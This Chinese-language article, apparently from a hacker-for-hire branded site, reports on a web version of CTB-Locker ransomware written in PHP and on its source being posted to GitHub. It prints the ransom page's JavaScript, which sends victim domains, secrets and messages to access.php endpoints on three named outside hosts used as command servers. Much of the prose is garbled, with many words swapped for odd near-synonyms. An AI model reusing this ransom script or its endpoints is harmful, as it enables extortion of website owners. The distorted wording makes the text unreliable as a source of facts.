Web版勒索软件CTB-Locker PHP源码现身GitHub

访客5年前关于黑客接单471

勒索软件CTB-Locker呈现其Web演化版别,可感染网页站点。据剖析,其编码为选用PHP编写,现在源码已被保管至GitHub上。
Web版勒索软件CTB-Locker的初次呈现
就在本年西方情人节前夕,英国的一位站长却有一个不愉快的发现,他查看到其办理的网站页面遭受篡改,篡改页面上呈现的信息看起来跟电脑感染歹意勒索软件的景象类似,其主要信息是让站点办理员付出比特币,交换相应目录文件的解密,以便使站点康复正常。篡改页面如下图,


 
在被验证为初次针对网页的勒索工作后,该工作便得到极大的重视。但其实作为服务器办理员来说,初步都只是期望这仅仅是一次性工作,而不是进犯者预谋的初步。
在初始阶段,实际上并无发现其他感染工作,而状况在曩昔的一个星期中有了极大的改变。在这段时间内频频呈现上述的网页勒索感染工作。据悉,到现在有超越100个同类型工作被发现。在篡改的信息中其暗地操纵者要求受害者付出0.4个比特币,而且如在两天内未完成付出,付出额度将提高至0.8个比特币。以下为其要求付出比特币的源码:
script>
admins = ["http://orangecountyplasterandstucco.com/access.php", "http://klinika-redwhite.com/access.php", "http://charoenpan.com/access.php"];
iadmin = 0;
domain = encodeURIComponent(window.location.href.replace('http://', '').replace('https://', '').split('/')[0]);
function post_admin(postdata, onsuccess) {
   $.post(admins[iadmin], postdata+"&domain="+domain, function (data) {
         if (data["status"] == "success") {
            onsuccess(data);
         } else {
            alert(data["status"]);
         }
      }, 'json'
   ).fail(function() {
      alert(iadmin >= 2 ? 'It seems like our server is down=( Try to push it again' : 'Push it again');
      iadmin = (iadmin + 1) % 3;
   });
}
$('#decrypt').click(function() {
   post_admin("decrypt=", function(data) {
      alert('Your decryption key is ' + data["decrypt"] + '! Wait while page will be updated!');
      url = window.location.href + (window.location.href.indexOf('?') !== -1 ? '&' : '?');
      window.location.href = url + 'decrypt=' + data["decrypt"] + '&secret=' + data["secret"] + '&dectest=' + data["dectest"];
   });
});
$('#dectest').click(function() {
   post_admin("dectest=&secret="+($("#secret").val()), function(data) {
      alert('Your test decryption key is ' + data["dectest"] + '! Wait while page will be updated!');
      url = window.location.href + (window.location.href.indexOf('?') !== -1 ? '&' : '?');
      window.location.href = url + 'dectest=' + data["dectest"] + '&secret=' + data["secret"];
   });
});
$('#sendmsg').click(function() {
   msg = "&msg=" + encodeURIComponent($("#chatmsg").val());
   post_admin("sendmsg=&secret="+$("#secret").val()+msg, function(data) {
      alert('Thank you for feedback!');
   });
});
$('#recvmsg').click(function() {
   post_admin("recvmsg=&secret="+$("#secret").val(), function(data) {
      $("#chatmsg").val(data["answer"]);
   });
});
   script>
该勒索程序在勒索付出告诉上,跟CTB-Locker为同一模型。但单单从技术上来看,这跟“声名远扬”的CTB-Locker勒索软件的状况不符。因其仅运转于Windows桌面环境,而并无法运转在 Linux Web服务器上。
Web版CTB-Locker选用PHP编写
来自 Stormshield的安全剖析员Benkow,设法剖析勒索软件的运转形式并从一个受感染的目标提取到了源代码。随后,Benkow将Web版CTB-Locker 源码上传至 KernelMode论坛上,供其他安全研讨人员剖析和研讨。而Web版CTB-Locker的“知名度”便敏捷提高,其源码也被保管至GitHub。
源代码地址请点击:GitHub
考虑到,此前勒索软件Hidden Tear源码也保管至GitHub,但工作终究却没有朝着有利于用户的方向发展。而结合当时的景象,能够预见,在接下来的数个月中,将或许呈现大规模的针对网页站点进行的进犯感染。

[1] [2]  黑客接单网

相关文章

运用Burp的intruder功用测验有csrf维护的应用程序

许多Web运用会有避免跨站恳求假造的战略,比方经过request恳求传一个当时页面有用或许当时会话有用的参数(假如他们没有,那就很值得研讨)。这些参数用来证明这个恳求是从预订用户宣布的,而不是进犯者那...

浅谈跨域威胁与安全-黑客接单平台

WEB前端中最常见的两种安全危险,XSS与CSRF,XSS,即跨站脚本进犯、CSRF即跨站恳求假造,两者归于跨域安全进犯,关于常见的XSS以及CSRF在此不多议论,仅议论一些不太常见的跨域技能以及安全...

一次射中可疑要挟情报的剖析探究

由于最近一段时刻里”驱动人生”这个病毒还挺抢手,最近发现经过一些安全厂商的设备发现内网里边有许多的主机都中了这个病毒瞬间吓哭了。后续经过对主机进行查看,竟然没有发现什么问题,后续发现是安全设备命中了一...

看我怎么发现GitHub提权缝隙取得$10000赏金

之前,我从没参加过GitHub官方的一些缝隙众测项目,在HackerOne建议的HackTheWorld竞赛中,主办方宣扬除了赏金以外,还有时机取得Github供给的终身无约束私有库(unlimit...

Google最新XSS Game Writeup

本文介绍了怎么完结谷歌最新的XSSGame的进程,完结了这八个应战就有时机取得Nexus 5x。实际上这八个应战整体来说都不难,都是些常见的xss。通关要求是只要能弹出alert窗口即可。 第一关...

Chafer运用的新的根据Python的有效载荷MechaFlounder

2019年11月,Chafer要挟小组针对土耳其政府从头运用他们在2019年早些时候运用的基础设施(Clearsky报导的活动中),特别是域名win10-update [.] com。尽管咱们没有见到...